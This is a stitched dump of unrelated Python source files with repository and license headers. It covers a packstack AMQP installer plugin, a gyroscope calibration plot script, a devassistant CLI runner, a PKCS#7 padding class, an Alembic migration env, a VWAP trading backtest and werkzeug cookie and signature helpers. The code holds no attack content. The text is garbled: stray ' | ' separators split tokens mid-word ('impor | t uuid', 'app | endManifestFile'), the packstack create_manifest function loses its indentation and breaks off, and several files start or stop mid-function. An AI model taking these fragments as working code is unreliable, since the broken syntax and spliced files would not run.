    Fix: the previous implementation looked weights up with
    ``window.index(value)``, which returns the position of the *first*
    occurrence -- duplicate values in a window were all given the weight of
    the first duplicate.  Enumerating the window assigns each position its
    own weight and also avoids the O(period^2) lookups.
    """
    catch_errors.check_for_period_error(data, period)
    # The denominator 1 + 2 + ... + period is the same for every window.
    weight_total = sum(range(1, period + 1))
    lwma = [sum(weight * value
                for weight, value in
                enumerate(data[idx + 1 - period:idx + 1], start=1)) / weight_total
            for idx in range(period - 1, len(data))]
    lwma = fill_for_noncomputable_vals(data, lwma)
    return lwma
|
fr34k8/packstack | packstack/plugins/amqp_002.py | Python | apache-2.0 | 9,717 | 0.000206 | # -*- coding: utf-8 -*-
"""
Installs and configures amqp
"""
import logging
impor | t uuid
import os
from packstack.installer import validators
from packstack.installer import processors
from packstack.installer import basedefs
from packstack.installer import utils
from packstack.modules.common import filtered_hosts
from packstack.modules.ospluginutils import (getManifestTemplate,
app | endManifestFile)
#------------------ oVirt installer initialization ------------------
PLUGIN_NAME = "AMQP"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')
def initConfig(controller):
    """Register the AMQP configuration groups with the installer controller.

    Three groups are added:
      * AMQP     -- always prompted: backend type, host, SSL/auth toggles.
      * AMQPSSL  -- prompted only when CONFIG_AMQP_ENABLE_SSL == 'y'.
      * AMQPAUTH -- prompted only when CONFIG_AMQP_ENABLE_AUTH == 'y'.
    """
    # Base AMQP parameters (always asked).
    params = [
        {"CMD_OPTION": "amqp-backend",
         "USAGE": ("Set the AMQP service backend. Allowed values are: "
                   "qpid, rabbitmq"),
         "PROMPT": "Set the AMQP service backend",
         "OPTION_LIST": ["qpid", "rabbitmq"],
         "VALIDATORS": [validators.validate_options],
         "DEFAULT_VALUE": "rabbitmq",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": False,
         "CONF_NAME": "CONFIG_AMQP_BACKEND",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False,
         # Answer files using the old CONFIG_AMQP_SERVER key still work.
         "DEPRECATES": ['CONFIG_AMQP_SERVER']},
        {"CMD_OPTION": "amqp-host",
         "USAGE": ("The IP address of the server on which to install the "
                   "AMQP service"),
         "PROMPT": "Enter the IP address of the AMQP service",
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_ssh],
         "DEFAULT_VALUE": utils.get_localhost_ip(),
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_HOST",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-enable-ssl",
         "USAGE": "Enable SSL for the AMQP service",
         "PROMPT": "Enable SSL for the AMQP service?",
         "OPTION_LIST": ["y", "n"],
         "VALIDATORS": [validators.validate_options],
         "DEFAULT_VALUE": "n",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": False,
         "CONF_NAME": "CONFIG_AMQP_ENABLE_SSL",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-enable-auth",
         "USAGE": "Enable Authentication for the AMQP service",
         "PROMPT": "Enable Authentication for the AMQP service?",
         "OPTION_LIST": ["y", "n"],
         "VALIDATORS": [validators.validate_options],
         "DEFAULT_VALUE": "n",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": False,
         "CONF_NAME": "CONFIG_AMQP_ENABLE_AUTH",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
    ]
    group = {"GROUP_NAME": "AMQP",
             "DESCRIPTION": "AMQP Config parameters",
             "PRE_CONDITION": False,
             "PRE_CONDITION_MATCH": True,
             "POST_CONDITION": False,
             "POST_CONDITION_MATCH": True}
    controller.addGroup(group, params)
    # SSL parameters; only asked when SSL was enabled in the group above.
    params = [
        {"CMD_OPTION": "amqp-nss-certdb-pw",
         "USAGE": ("The password for the NSS certificate database of the AMQP "
                   "service"),
         "PROMPT": "Enter the password for NSS certificate database",
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "PW_PLACEHOLDER",
         "PROCESSORS": [processors.process_password],
         "MASK_INPUT": True,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_NSS_CERTDB_PW",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": True,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-ssl-port",
         "USAGE": ("The port in which the AMQP service listens to SSL "
                   "connections"),
         "PROMPT": "Enter the SSL port for the AMQP service",
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "5671",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_SSL_PORT",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-ssl-cert-file",
         "USAGE": ("The filename of the certificate that the AMQP service "
                   "is going to use"),
         "PROMPT": ("Enter the filename of the SSL certificate for the AMQP "
                    "service"),
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "/etc/pki/tls/certs/amqp_selfcert.pem",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_SSL_CERT_FILE",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-ssl-key-file",
         "USAGE": ("The filename of the private key that the AMQP service "
                   "is going to use"),
         "PROMPT": "Enter the private key filename",
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "/etc/pki/tls/private/amqp_selfkey.pem",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_SSL_KEY_FILE",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-ssl-self-signed",
         "USAGE": "Auto Generates self signed SSL certificate and key",
         "PROMPT": "Generate Self Signed SSL Certificate",
         "OPTION_LIST": ["y", "n"],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "y",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_SSL_SELF_SIGNED",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
    ]
    group = {"GROUP_NAME": "AMQPSSL",
             "DESCRIPTION": "AMQP Config SSL parameters",
             "PRE_CONDITION": "CONFIG_AMQP_ENABLE_SSL",
             "PRE_CONDITION_MATCH": "y",
             "POST_CONDITION": False,
             "POST_CONDITION_MATCH": True}
    controller.addGroup(group, params)
    # Authentication parameters; only asked when auth was enabled above.
    params = [
        {"CMD_OPTION": "amqp-auth-user",
         "USAGE": "User for amqp authentication",
         "PROMPT": "Enter the user for amqp authentication",
         "OPTION_LIST": [],
         "VALIDATORS": [validators.validate_not_empty],
         "DEFAULT_VALUE": "amqp_user",
         "MASK_INPUT": False,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_AUTH_USER",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": False,
         "CONDITION": False},
        {"CMD_OPTION": "amqp-auth-password",
         "USAGE": "Password for user authentication",
         "PROMPT": "Enter the password for user authentication",
         "OPTION_LIST": ["y", "n"],
         "VALIDATORS": [validators.validate_not_empty],
         "PROCESSORS": [processors.process_password],
         "DEFAULT_VALUE": "PW_PLACEHOLDER",
         "MASK_INPUT": True,
         "LOOSE_VALIDATION": True,
         "CONF_NAME": "CONFIG_AMQP_AUTH_PASSWORD",
         "USE_DEFAULT": False,
         "NEED_CONFIRM": True,
         "CONDITION": False},
    ]
    group = {"GROUP_NAME": "AMQPAUTH",
             "DESCRIPTION": "AMQP Config Athentication parameters",
             "PRE_CONDITION": "CONFIG_AMQP_ENABLE_AUTH",
             "PRE_CONDITION_MATCH": "y",
             "POST_CONDITION": False,
             "POST_CONDITION_MATCH": True}
    controller.addGroup(group, params)
def initSequences(controller):
    """Register the AMQP installation sequence with the controller."""
    manifest_step = {
        'title': 'Adding AMQP manifest entries',
        'functions': [create_manifest],
    }
    controller.addSequence("Installing AMQP", [], [], [manifest_step])
#-------------------------- step functions --------------------------
def create_manifest(config, messages):
server = utils.ScriptRunner(config['CONFIG_AMQP_HOST'])
if config['CONFIG_AMQP_ENABLE_SSL'] == 'y':
config['CONFIG_AMQP_ENABLE_SSL'] = 'true'
config['CONFIG_AMQP_PROTOCOL'] = 'ssl'
c |
hbldh/wlmetrics | wlmetrics/data/processing.py | Python | mit | 1,548 | 0.003876 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`processing`
==================
.. module:: processing
:platform: Unix, Windows
:synopsis:
.. moduleauthor:: hbldh <henrik.blidh@nedomkull.com>
Created on 2015-08-26, 14:48
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import numpy as np
import scipy.integrate as scint
import matplotlib.pyplot as plt
from pyberryimu.calibration.standard import StandardCalibration
from pyberryimu.container import BerryIMUDataContainer
# Script body: compare several gyroscope calibrations on a recorded session.
# Recorded gyroscope data set to evaluate the calibrations against.
data = BerryIMUDataContainer.load('rec_gyro.json')
# First stored calibration.  57.2957795 == 180/pi, so this presumably
# rescales bias/scale from radians to degrees -- TODO confirm.
sc1 = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu-BACKUP_g1')
sc1.gyro_bias_vector *= 57.2957795
sc1.gyro_scale_factor_vector *= 57.2957795
# Second stored calibration, used unmodified.
sc2 = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu-BACKUP_g2')
# Datasheet-derived calibration built from the recording's client settings.
sc_sh = StandardCalibration.load('/home/hbldh/Dropbox/Encrypted/PyBerryIMU/.pyberryimu')
sc_sh.set_datasheet_values_for_gyroscope(data.client_settings)
# Apply each calibration to every recorded gyroscope sample.
g_sc1 = []
g_sc2 = []
g_sh = []
for row in data.gyroscope:
    g_sc1.append(sc1.transform_gyroscope_values(row.tolist()))
    g_sc2.append(sc2.transform_gyroscope_values(row.tolist()))
    g_sh.append(sc_sh.transform_gyroscope_values(row.tolist()))
# Axis index to plot (0 == first gyroscope axis).
d = 0
g_sc1 = np.array(g_sc1)
g_sc2 = np.array(g_sc2)
g_sh = np.array(g_sh)
# Plot calibration 1 (blue) against the cumulatively integrated
# datasheet-calibrated signal (magenta); dx=1/100. suggests a 100 Hz
# sample rate -- TODO confirm.
plt.plot(g_sc1[:, d], 'b')
plt.plot(scint.cumtrapz(g_sh[:, d], dx=1/100.), 'm')
#plt.plot(g_sc2[:, d], 'g')
#plt.plot(g_sh[:, d], 'r')
plt.show()
|
techtonik/devassistant | devassistant/cli/cli_runner.py | Python | gpl-2.0 | 4,484 | 0.001561 | import logging
import os
import sys
import six
try:
# stdout/stdrr wrapper to render ANSI sequences in Windows
import colorama
colorama.init()
except ImportError:
pass
from devassistant import actions
from devassistant import bin
from devassistant.cli import argparse_generator
from devassistant import exceptions
from devassistant import logger
from devassistant import path_runner
from devassistant import settings
from devassistant import sigint_handler
from devassistant import utils
class CliRunner(object):
    """Entry point for DevAssistant's command line interface."""
    # The console handler most recently installed by
    # register_console_logging_handler; change_logging_level mutates it.
    cur_handler = None
    @classmethod
    def register_console_logging_handler(cls, lgr, level=logging.INFO):
        """Registers console logging handler to given logger."""
        console_handler = logger.DevassistantClHandler(sys.stdout)
        # Colorize output only when stdout is an interactive terminal.
        if console_handler.stream.isatty():
            console_handler.setFormatter(logger.DevassistantClColorFormatter())
        else:
            console_handler.setFormatter(logger.DevassistantClFormatter())
        console_handler.setLevel(level)
        cls.cur_handler = console_handler
        lgr.addHandler(console_handler)
    @classmethod
    def change_logging_level(cls, level):
        # Adjust verbosity of the handler installed above (e.g. for --debug).
        cls.cur_handler.setLevel(level)
    @classmethod
    def run(cls):
        """Runs the whole cli:
        1. Registers console logging handler
        2. Creates argparser from all assistants and actions
        3. Parses args and decides what to run
        4. Runs a proper assistant or action
        """
        sigint_handler.override()
        # set settings.USE_CACHE before constructing parser, since constructing
        # parser requires loaded assistants
        settings.USE_CACHE = False if '--no-cache' in sys.argv else True
        cls.register_console_logging_handler(logger.logger)
        is_log_file = logger.add_log_file_handler(settings.LOG_FILE)
        if not is_log_file:
            logger.logger.warning("Could not create log file '{0}'.".format(settings.LOG_FILE))
        cls.inform_of_short_bin_name(sys.argv[0])
        top_assistant = bin.TopAssistant()
        tree = top_assistant.get_subassistant_tree()
        argparser = argparse_generator.ArgparseGenerator.\
            generate_argument_parser(tree, actions=actions.actions)
        parsed_args = vars(argparser.parse_args())
        # On Python 2 argparse yields byte strings; decode them so the rest
        # of the pipeline always sees text.
        parsed_args_decoded = dict()
        for k, v in parsed_args.items():
            parsed_args_decoded[k] = \
                v.decode(utils.defenc) if not six.PY3 and isinstance(v, str) else v
        parsed_args_decoded['__ui__'] = 'cli'
        if parsed_args.get('da_debug'):
            cls.change_logging_level(logging.DEBUG)
        # Prepare Action/PathRunner
        if actions.is_action_run(**parsed_args_decoded):
            to_run = actions.get_action_to_run(**parsed_args_decoded)(**parsed_args_decoded)
        else:
            parsed_args = cls.transform_executable_assistant_alias(parsed_args_decoded)
            path = top_assistant.get_selected_subassistant_path(**parsed_args_decoded)
            to_run = path_runner.PathRunner(path, parsed_args_decoded)
        try:
            to_run.run()
        except exceptions.ExecutionException:
            # error is already logged, just catch it and silently exit here
            sys.exit(1)
    @classmethod
    def inform_of_short_bin_name(cls, binary):
        """Historically, we had "devassistant" binary, but we chose to go with
        shorter "da". We still allow "devassistant", but we recommend using "da".
        """
        binary = os.path.splitext(os.path.basename(binary))[0]
        if binary != 'da':
            msg = '"da" is the pre | ffered way of running "{binary}".'.format(binary=binary)
            logger.logger.info('*' * len(msg))
            logger.logger.info(msg)
            logger.logger.info('*' * len(msg))
    @classmethod
    def transform_executable_assistant_alias(cls, parsed_args):
        # Replace an assistant alias given as the first subcommand with the
        # assistant's canonical name.
        key = settings.SUBASSISTANT_N_STRING.format(0)
        for assistant in [bin.CreatorAssistant, bin.TweakAssistant,
                          bin.PreparerAssistant, bin.ExtrasAssistant]:
            if parsed_args[key] in assistant.aliases:
                parsed_args[key] = assistant.name
        return parsed_args
if __name__ == '__main__':
    # this is here mainly because of utils.cl_string_from_da_eval
    # because it's the safest way to invoke DA on commandline
    # (invoking "da" binary is not safe because we can use os.chdir and so on)
    CliRunner.run()
|
mooosu/python-utils | encrypt/pkcs7.py | Python | apache-2.0 | 1,944 | 0.003086 | import binascii
import StringIO
class PKCS7Encoder(object):
    '''
    RFC 2315: PKCS#7 page 21
    Some content-encryption algorithms assume the
    input length is a multiple of k octets, where k > 1, and
    let the application define a method for handling inputs
    whose lengths are not a multiple of k octets. For such
    algorithms, the method shall be to pad the input at the
    trailing end with k - (l mod k) octets all having value k -
    (l mod k), where l is the length of the input. In other
    words, the input is padded at the trailing end with one of
    the following strings:
             01 -- if l mod k = k-1
            02 02 -- if l mod k = k-2
                        .
                        .
                        .
          k k ... k k -- if l mod k = 0
    The padding can be removed unambiguously since all input is
    padded and no padding string is a suffix of another. This
    padding method is well-defined if and only if k < 256;
    methods for larger k are an open issue for further study.
    '''
    def __init__(self, k=16):
        # Block size in octets; must stay below 256 because every padding
        # byte stores the padding length (see class docstring).
        self.k = k
    ## @param text The padded text for which the padding is to be removed.
    # @exception ValueError Raised when the input padding is missing or corrupt.
    def decode(self, text):
        '''
        Remove the PKCS#7 padding from a text string
        '''
        nl = len(text)
        # The last byte of a padded message encodes the padding length.
        # (Python 2 byte-string indexing -- text[-1] is a 1-char str.)
        val = int(binascii.hexlify(text[-1]), 16)
        if val > self.k:
            raise ValueError('Input is not padded or padding is corrupt')
        l = nl - val
        return text[:l]
    ## @param text The text to encode.
    def encode(self, text):
        '''
        Pad an input string according to PKCS#7
        '''
        l = len(text)
        output = StringIO.StringIO()
        # Always pads: a full block of padding is appended when l is
        # already a multiple of k.  (StringIO/xrange make this Python 2.)
        val = self.k - (l % self.k)
        for _ in xrange(val):
            output.write('%02x' % val)
        return text + binascii.unhexlify(output.getvalue())
|
bryanforbes/Erasmus | alembic/env.py | Python | bsd-3-clause | 2,487 | 0.000402 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
from erasmus.db import db
from botus_receptus.config import load
from pathlib import Path
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = db
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
    """Run migrations in 'offline' mode.

    This configures the context with just a URL
    and not an Engine, though an Engine is acceptable
    here as well.  By skipping the Engine creation
    we don't even need a DBAPI to be available.

    Calls to context.execute() here emit the given string to the
    script output.
    """
    offline_url = config.get_main_option("sqlalchemy.url")
    context.configure(
        url=offline_url,
        target_metadata=target_metadata,
        literal_binds=True,
    )
    with context.begin_transaction():
        context.run_migrations()
def run_migrations_online():
    """Run migrations in 'online' mode.

    In this scenario we need to create an Engine
    and associate a connection with the context.
    """
    def _skip_empty_autogenerate(ctx, revision, directives):
        # When autogenerating, drop the revision entirely if it would
        # contain no operations.
        if config.cmd_opts.autogenerate:
            migration_script = directives[0]
            if migration_script.upgrade_ops.is_empty():
                directives[:] = []

    app_config = load(Path(__file__).resolve().parent.parent / 'config.toml')
    engine = engine_from_config(
        config.get_section(config.config_ini_section),
        prefix='sqlalchemy.',
        poolclass=pool.NullPool,
        url=app_config['db_url'],
    )

    with engine.connect() as connection:
        context.configure(
            connection=connection,
            target_metadata=target_metadata,
            process_revision_directives=_skip_empty_autogenerate,
        )
        with context.begin_transaction():
            context.run_migrations()
if context.is_offline_mode():
    run_migrations_offline()
else:
    run_migrations_online()
|
cgqyh/pyalgotrade-mod | samples/bccharts_example_2.py | Python | apache-2.0 | 3,396 | 0.000883 | from pyalgotrade import bar
from pyalgotrade import strategy
from pyalgotrade import plotter
from pyalgotrade.technical import vwap
from pyalgotrade.barfeed import csvfeed
from pyalgotrade.bitstamp import broker
from pyalgotrade import broker as basebroker
class VWAPMomentum(strategy.BacktestingStrategy):
    """VWAP momentum backtesting strategy (Python 2 code).

    Buys with ~98% of available cash when price rises above VWAP by
    ``buyThreshold`` (fractional), sells the whole position when price
    falls below VWAP by ``sellThreshold``.
    """
    # Minimum notional (price * size) a buy order must reach to be placed.
    MIN_TRADE = 5
    def __init__(self, feed, brk, instrument, vwapWindowSize, buyThreshold, sellThreshold):
        strategy.BacktestingStrategy.__init__(self, feed, brk)
        self.__instrument = instrument
        # Rolling VWAP over the last vwapWindowSize bars of the instrument.
        self.__vwap = vwap.VWAP(feed[instrument], vwapWindowSize)
        self.__buyThreshold = buyThreshold
        self.__sellThreshold = sellThreshold
    def _getActiveOrders(self):
        # Split the broker's active orders into (buy, sell) lists.
        # (Python 2: filter() returns lists here.)
        orders = self.getBroker().getActiveOrders()
        buy = filter(lambda o: o.isBuy(), orders)
        sell = filter(lambda o: o.isSell(), orders)
        return buy, sell
    def _cancelOrders(self, orders):
        brk = self.getBroker()
        for o in orders:
            self.info("Canceling order %s" % (o.getId()))
            brk.cancelOrder(o)
    def _buySignal(self, price):
        # Cancel opposing sell orders, then place a limit buy with ~98% of
        # cash if no buy order is pending and the trade is large enough.
        buyOrders, sellOrders = self._getActiveOrders()
        self._cancelOrders(sellOrders)
        brk = self.getBroker()
        cashAvail = brk.getCash() * 0.98
        size = round(cashAvail / price, 3)
        if len(buyOrders) == 0 and price*size > VWAPMomentum.MIN_TRADE:
            self.info("Buy %s at %s" % (size, price))
            try:
                self.limitOrder(self.__instrument, price, size)
            except Exception, e:
                self.error("Failed to buy: %s" % (e))
    def _sellSignal(self, price):
        # Cancel opposing buy orders, then offer the whole position at the
        # given limit price if no sell order is pending.
        buyOrders, sellOrders = self._getActiveOrders()
        self._cancelOrders(buyOrders)
        brk = self.getBroker()
        shares = brk.getShares(self.__instrument)
        if len(sellOrders) == 0 and shares > 0:
            self.info("Sell %s at %s" % (shares, price))
            self.limitOrder(self.__instrument, price, shares*-1)
    def getVWAP(self):
        # Expose the VWAP data series (e.g. for plotting).
        return self.__vwap
    def onBars(self, bars):
        # Trade signal per bar: compare the close against VWAP bands.
        vwap = self.__vwap[-1]
        if vwap is None:
            return
        price = bars[self.__instrument].getClose()
        if price > vwap * (1 + self.__buyThreshold):
            self._buySignal(price)
        elif price < vwap * (1 - self.__sellThreshold):
            self._sellSignal(price)
    def onOrderUpdated(self, order):
        # Log every order state transition.
        if order.isBuy():
            orderType = "Buy"
        else:
            orderType = "Sell"
        self.info("%s order %d updated - Status: %s - %s" % (
            orderType,
            order.getId(),
            basebroker.Order.State.toString(order.getState()),
            order.getExecutionInfo(),
        ))
def main(plot):
    """Backtest the VWAP momentum strategy on 30-minute Bitstamp BTC bars.

    :param plot: when True, display a chart of the run including the VWAP
                 series.
    """
    symbol = "BTC"
    starting_cash = 1000
    window_size = 100
    buy_threshold = 0.02
    sell_threshold = 0.01

    feed = csvfeed.GenericBarFeed(bar.Frequency.MINUTE * 30)
    feed.addBarsFromCSV(symbol, "30min-bitstampUSD.csv")
    backtest_broker = broker.BacktestingBroker(starting_cash, feed)
    strat = VWAPMomentum(feed, backtest_broker, symbol, window_size,
                         buy_threshold, sell_threshold)

    chart = None
    if plot:
        chart = plotter.StrategyPlotter(strat)
        chart.getInstrumentSubplot(symbol).addDataSeries("VWAP", strat.getVWAP())

    strat.run()

    if plot:
        chart.plot()
if __name__ == "__main__":
    main(True)
syrrim/werkzeug | werkzeug/_internal.py | Python | bsd-3-clause | 13,953 | 0.001433 | # -*- coding: utf-8 -*-
"""
werkzeug._internal
~~~~~~~~~~~~~~~~~~
This module provides internally used helpers and constants.
:copyright: (c) 2014 by | the Werkzeug Team, see AUTHORS for more details.
:l | icense: BSD, see LICENSE for more details.
"""
import re
import string
import inspect
from weakref import WeakKeyDictionary
from datetime import datetime, date
from itertools import chain
from werkzeug._compat import iter_bytes, text_type, BytesIO, int_to_byte, \
range_type, integer_types
_logger = None
_empty_stream = BytesIO()
_signature_cache = WeakKeyDictionary()
_epoch_ord = date(1970, 1, 1).toordinal()
_cookie_params = set((b'expires', b'path', b'comment',
b'max-age', b'secure', b'httponly',
b'version'))
_legal_cookie_chars = (string.ascii_letters +
string.digits +
u"!#$%&'*+-.^_`|~:").encode('ascii')
_cookie_quoting_map = {
b',': b'\\054',
b';': b'\\073',
b'"': b'\\"',
b'\\': b'\\\\',
}
for _i in chain(range_type(32), range_type(127, 256)):
_cookie_quoting_map[int_to_byte(_i)] = ('\\%03o' % _i).encode('latin1')
_octal_re = re.compile(b'\\\\[0-3][0-7][0-7]')
_quote_re = re.compile(b'[\\\\].')
_legal_cookie_chars_re = b'[\w\d!#%&\'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]'
_cookie_re = re.compile(b"""(?x)
(
(?P<key>[^=]+)
\s*=\s*
)? # Without equals sign, the key is empty - see http://stackoverflow.com/a/1969339/4455114
(?P<val>
"(?:[^\\\\"]|\\\\.)*" |
(?:.*?)
)
\s*;
""")
class _Missing(object):
def __repr__(self):
return 'no value'
def __reduce__(self):
return '_missing'
_missing = _Missing()
def _get_environ(obj):
env = getattr(obj, 'environ', obj)
assert isinstance(env, dict), \
'%r is not a WSGI environment (has to be a dict)' % type(obj).__name__
return env
def _log(type, message, *args, **kwargs):
    """Log into the internal werkzeug logger.

    *type* is the name of a :class:`logging.Logger` method (``'info'``,
    ``'warning'``, ...); the remaining arguments are forwarded to it.
    """
    global _logger
    # Lazily create the logger on first use so importing this module does
    # not configure logging as a side effect.
    if _logger is None:
        import logging
        _logger = logging.getLogger('werkzeug')
        # Only set up a default log handler if the
        # end-user application didn't set anything up.
        if not logging.root.handlers and _logger.level == logging.NOTSET:
            _logger.setLevel(logging.INFO)
            handler = logging.StreamHandler()
            _logger.addHandler(handler)
    getattr(_logger, type)(message.rstrip(), *args, **kwargs)
def _parse_signature(func):
    """Return a signature object for the function.

    The result is a callable mapping ``(args, kwargs)`` to the tuple
    ``(new_args, kwargs, missing, extra, extra_positional, arguments,
    vararg_var, kwarg_var)``; it is cached per function in a
    WeakKeyDictionary so repeated calls are cheap.
    """
    # Unwrap bound/unbound methods (``im_func`` exists on Python 2 only).
    if hasattr(func, 'im_func'):
        func = func.im_func
    # if we have a cached validator for this function, return it
    parse = _signature_cache.get(func)
    if parse is not None:
        return parse
    # inspect the function signature and collect all the information
    # (getfullargspec on Python 3, getargspec on Python 2)
    if hasattr(inspect, 'getfullargspec'):
        tup = inspect.getfullargspec(func)
    else:
        tup = inspect.getargspec(func)
    positional, vararg_var, kwarg_var, defaults = tup[:4]
    defaults = defaults or ()
    arg_count = len(positional)
    # Build (name, has_default, default) triples for each positional arg.
    # Negative indexing works because defaults align with the tail of the
    # positional argument list.
    arguments = []
    for idx, name in enumerate(positional):
        if isinstance(name, list):
            raise TypeError('cannot parse functions that unpack tuples '
                            'in the function signature')
        try:
            default = defaults[idx - arg_count]
        except IndexError:
            param = (name, False, None)
        else:
            param = (name, True, default)
        arguments.append(param)
    arguments = tuple(arguments)
    def parse(args, kwargs):
        # NOTE: mutates local copies only; ``kwargs`` is popped from while
        # matching, and reset to {} when no **kwargs catch-all exists.
        new_args = []
        missing = []
        extra = {}
        # consume as many arguments as positional as possible
        for idx, (name, has_default, default) in enumerate(arguments):
            try:
                new_args.append(args[idx])
            except IndexError:
                try:
                    new_args.append(kwargs.pop(name))
                except KeyError:
                    if has_default:
                        new_args.append(default)
                    else:
                        missing.append(name)
            else:
                if name in kwargs:
                    extra[name] = kwargs.pop(name)
        # handle extra arguments
        extra_positional = args[arg_count:]
        if vararg_var is not None:
            new_args.extend(extra_positional)
            extra_positional = ()
        if kwargs and kwarg_var is None:
            extra.update(kwargs)
            kwargs = {}
        return new_args, kwargs, missing, extra, extra_positional, \
            arguments, vararg_var, kwarg_var
    _signature_cache[func] = parse
    return parse
def _date_to_unix(arg):
    """Converts a timetuple, integer or datetime object into the seconds from
    epoch in utc.
    """
    if isinstance(arg, datetime):
        arg = arg.utctimetuple()
    elif isinstance(arg, integer_types + (float,)):
        # Numbers are already seconds since the epoch.
        return int(arg)
    year, month, day, hour, minute, second = arg[:6]
    day_count = date(year, month, 1).toordinal() - _epoch_ord + day - 1
    return ((day_count * 24 + hour) * 60 + minute) * 60 + second
class _DictAccessorProperty(object):
"""Baseclass for `environ_property` and `header_property`."""
read_only = False
def __init__(self, name, default=None, load_func=None, dump_func=None,
read_only=None, doc=None):
self.name = name
self.default = default
self.load_func = load_func
self.dump_func = dump_func
if read_only is not None:
self.read_only = read_only
self.__doc__ = doc
def __get__(self, obj, type=None):
if obj is None:
return self
storage = self.lookup(obj)
if self.name not in storage:
return self.default
rv = storage[self.name]
if self.load_func is not None:
try:
rv = self.load_func(rv)
except (ValueError, TypeError):
rv = self.default
return rv
def __set__(self, obj, value):
if self.read_only:
raise AttributeError('read only property')
if self.dump_func is not None:
value = self.dump_func(value)
self.lookup(obj)[self.name] = value
def __delete__(self, obj):
if self.read_only:
raise AttributeError('read only property')
self.lookup(obj).pop(self.name, None)
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
self.name
)
def _cookie_quote(b):
    """Quote a cookie value (bytes): escape illegal bytes via the quoting
    map and wrap the result in double quotes when any escaping occurred."""
    out = bytearray()
    needs_quotes = False
    for byte in iter_bytes(b):
        if byte not in _legal_cookie_chars:
            needs_quotes = True
            byte = _cookie_quoting_map.get(byte, byte)
        out.extend(byte)
    if needs_quotes:
        return bytes(b'"' + out + b'"')
    return bytes(out)
def _cookie_unquote(b):
    """Reverse :func:`_cookie_quote` on a bytes value.

    Values not wrapped in double quotes are returned unchanged.  Inside
    quotes, ``\\ooo`` octal escapes and ``\\c`` single-character escapes
    are decoded.
    """
    # Too short to carry surrounding quotes.
    if len(b) < 2:
        return b
    # Not quoted at all -> nothing was escaped.
    if b[:1] != b'"' or b[-1:] != b'"':
        return b
    # Strip the surrounding quotes and scan for escape sequences.
    b = b[1:-1]
    i = 0
    n = len(b)
    rv = bytearray()
    _push = rv.extend
    while 0 <= i < n:
        o_match = _octal_re.search(b, i)
        q_match = _quote_re.search(b, i)
        # No escapes left: copy the remainder verbatim.
        if not o_match and not q_match:
            rv.extend(b[i:])
            break
        j = k = -1
        if o_match:
            j = o_match.start(0)
        if q_match:
            k = q_match.start(0)
        # Handle whichever escape occurs first.
        if q_match and (not o_match or k < j):
            # "\c" -> literal byte c
            _push(b[i:k])
            _push(b[k + 1:k + 2])
            i = k + 2
        else:
            # "\ooo" -> byte with octal value ooo
            _push(b[i:j])
            rv.append(int(b[j + 1:j + 4], 8))
            i = j + 4
    return bytes(rv)
def _cookie_parse_impl(b):
"""Lowlevel cookie parsing facility that operates on bytes."""
i = 0
n = len(b)
while i < n:
match = _cookie_re.search(b + b';', i)
if not match:
break
key = (match.group('key') or '').strip()
value = match.group('val').strip()
i = match.end(0)
|
smc/silpa | src/silpa/modules/transliterator/cmudict.py | Python | agpl-3.0 | 5,575 | 0.071214 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Any Indian Language to any other Indian language transliterator
# Copyright 2008-2010 Santhosh Thottingal <santhosh.thottingal@gmail.com>
